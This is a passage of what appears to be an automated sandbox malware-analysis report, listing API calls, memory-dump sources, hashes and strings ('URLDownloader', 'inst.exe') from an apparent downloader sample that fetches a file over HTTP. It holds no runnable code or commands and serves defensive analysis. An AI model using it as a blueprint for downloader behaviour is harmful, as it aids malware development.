                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@std@@$?width@ios_base@std@@$?rdbuf@?$basic_ios@D@std@@@2@V?$basic_streambuf@$?fill@?$basic_ios@?sputc@?$basic_streambuf@$?flags@ios_base@std@@?setstate@?$basic_ios@?sputn@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4125389999-0
                                                                                                                                                                      • Opcode ID: d7ddfb35de5600b2af610cc6f86c0c04c4b658ff1ac8b4a744557df133d45fe0
                                                                                                                                                                      • Instruction ID: 9f71a8f020fe28d290ef7ad39ca2b4630c2ccf5d8ae75f0951f39d4c8cecbd13
                                                                                                                                                                      • Opcode Fuzzy Hash: d7ddfb35de5600b2af610cc6f86c0c04c4b658ff1ac8b4a744557df133d45fe0
                                                                                                                                                                      • Instruction Fuzzy Hash: 35B1C974D00259DFEB04CF94C895BADBBB1FF48344F208169E90AAB359CB34A985CF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 028700BA
                                                                                                                                                                      • getaddrinfo.WS2_32(100170B4,10013B50,?,00000000), ref: 02870101
                                                                                                                                                                      • WSACleanup.WS2_32 ref: 02870110
                                                                                                                                                                      • socket.WS2_32(?,?,?), ref: 02870159
                                                                                                                                                                      • WSACleanup.WS2_32 ref: 0287016D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2560534018-0
                                                                                                                                                                      • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                      • Instruction ID: 21b0b0790c34189d8d3567152e655fbba220c72fba53aaa7af3dd52b19a4c61b
                                                                                                                                                                      • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                      • Instruction Fuzzy Hash: 456119B9905215EFE705DFA8CD88BAE7BB5FB08315F108199E509A72A0C734D940CF65
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenA.WININET(10012448,00000001,00000000,00000000,00000000), ref: 02861BA1
                                                                                                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 02861BBD
                                                                                                                                                                      • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 02861C04
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 02861C21
                                                                                                                                                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 02861C3C
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 02861CF2
                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 02861D0F
                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 02861D19
                                                                                                                                                                      • GetParent.USER32(?), ref: 02861D23
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 02861D32
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindow
                                                                                                                                                                      • String ID: inst.exe
                                                                                                                                                                      • API String ID: 2293700532-606395854
                                                                                                                                                                      • Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                      • Instruction ID: 0a6ae5a8c0a7f2d22a216ee2994046773e4b3220c9abe0bb299dff6a22d92d4c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                      • Instruction Fuzzy Hash: A6512AB5D40218ABEB00DFA4CD89BAEB775FF49701F108608F605BA290D775AA90DF61
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 02861829
                                                                                                                                                                        • Part of subcall function 028615D7: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 02861632
                                                                                                                                                                        • Part of subcall function 028615D7: CoTaskMemFree.COMBASE(00000000), ref: 02861685
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 02861984
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 028619BF
                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 028619CE
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 028619F5
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02861A03
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02861A0D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$Window$ClassCreateDispatchFolderFreeHandleKnownModulePathRegisterShowTaskTranslate
                                                                                                                                                                      • String ID: URLDownloader$inst.exe
                                                                                                                                                                      • API String ID: 1820083345-3182466430
                                                                                                                                                                      APIs
                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 10010CFE
                                                                                                                                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 10010D18
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2442719207-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(10012398), ref: 02861152
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,100123AC), ref: 02861164
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,100123C0), ref: 02861178
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 028611D4
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 028611E8
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0286120D
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 02861228
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 02861236
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 02861240
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3658383123-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4D7
                                                                                                                                                                      • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4E4
                                                                                                                                                                      • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4EF
                                                                                                                                                                      • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B50B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1504536088-3916222277
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B042
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B04F
                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B05A
                                                                                                                                                                      • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B067
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 623893373-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 1000AEE8
                                                                                                                                                                      • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000AF08
                                                                                                                                                                      • _Min_value.LIBCPMTD ref: 1000AF1F
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000AF33
                                                                                                                                                                      • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AF5F
                                                                                                                                                                      • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 1000AF9D
                                                                                                                                                                      • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 1000AFEE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1591557727-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3353612457-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B35D
                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B36E
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B379
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000B3A3
                                                                                                                                                                      • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B3D3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4206206407-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 1000ADB1
                                                                                                                                                                      • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000ADCB
                                                                                                                                                                      • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 1000AE1C
                                                                                                                                                                      • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AE4D
                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 1000AE7C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1074265955-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004037
                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 10004074
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004091
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 100040A9
                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 100040D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1216362210-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: dllmain_raw$Main@12
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2964726511-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107DD
                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107EA
                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,10014F2C), ref: 10010EED
                                                                                                                                                                      • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 10010EFC
                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(?,10014F90), ref: 10010F0A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1722040371-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(100172D4,URLDownloader,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000), ref: 1001072A
                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 1001075D
                                                                                                                                                                      • WakeAllConditionVariable.KERNEL32(100172D0,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 10010768
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                                                                                      • String ID: URLDownloader
                                                                                                                                                                      • API String ID: 1466638765-1891997712
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0286FF47: NdrClientCall2.RPCRT4 ref: 0286FF66
                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 0286F16C
                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 0286F179
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeTask$Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3085621743-0
                                                                                                                                                                      • Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                      • Instruction ID: d144b95598f01d7cf71f5bdaff15b8026ee57b8986f99e38e747a1526236fb14
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                      • Instruction Fuzzy Hash: C35104B8D0020DEBCF05CF94D888BFEB7B6BF58308F108149E616A7640D735AA85CB95
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 0286400E
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 02864068
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02864080
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 028640CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                      • Opcode ID: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                      • Instruction ID: 0b4b502acff8624c61df70e4b9a485c97e45208924927cf16a8ca1c3cf5678e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                      • Instruction Fuzzy Hash: 383134B9E40204BFEB14EF98CC86FAEB7B5EB48710F204254F615AB2C1D671AA10CB55
                                                                                                                                                                      APIs
                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10011CF6,000000FF,?,1000CB92,?), ref: 1000D350
                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10011CF6,000000FF,?,1000CB92), ref: 1000D36B
                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,1000CB92,?), ref: 1000D39F
                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 1000D417
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1566052064-0
                                                                                                                                                                      • Opcode ID: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                      • Instruction ID: 4d9198b2984e5e082309ff7aa8a3130d82e8df6aeec633f907ab193b7f9989e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                      • Instruction Fuzzy Hash: 79313EB4D00259DFDB04DFA4C895BEEBBB4FF48350F208619E915A3395DB34AA40CBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 10010BFD
